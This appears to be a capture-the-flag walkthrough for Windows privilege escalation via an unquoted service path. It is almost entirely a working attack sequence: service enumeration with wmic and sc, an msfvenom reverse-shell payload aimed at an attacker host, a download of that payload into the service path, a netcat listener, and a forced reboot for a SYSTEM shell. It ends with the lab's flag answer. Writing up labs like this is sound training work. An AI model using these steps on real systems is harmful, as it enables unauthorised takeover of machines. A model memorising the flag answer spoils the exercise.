Grammar is important. Don't believe me? Just see what happens when you forget punctuation.
use Remmina to log into the machine
open cmd and start enumerate
systeminfo
net user
Check whoami /priv. This can reveal some very easy ways to escalate, but we're unlucky this time:
list all services which contains no space (very useful with abnormal)
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Get some more information about the service
sc qc "Development Service"
This path is definetly unquoted. The Start Type is AUTO_START, so we have to look at this again
Upon boot (because of Start Type: AUTO_START) this service searches for the exe in this order:
- C:\Program.exe
- C:\Program Files\Development.exe
- C:\Program Files\Development Files\Devservice.exe
- C:\Program Files\Development Files\Devservice Files\Service.exe
Generate a payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.74 LPORT=4444 -f exe -o Devservice.exe
python3 -m http.server
cd C:\Program Files\Development Files
powershell
wget http://10.8.0.74:8000/Devservice.exe -OutFile Devservice.exe
dir
open listener
nc -vlnp 4444
restart the machine
shutdown /r /t 0
after reboot, when it turn on back, you will get the shell
| Flag | flag.txt |
|---|---|
| Answer | THM{USPE_SUCCESS} |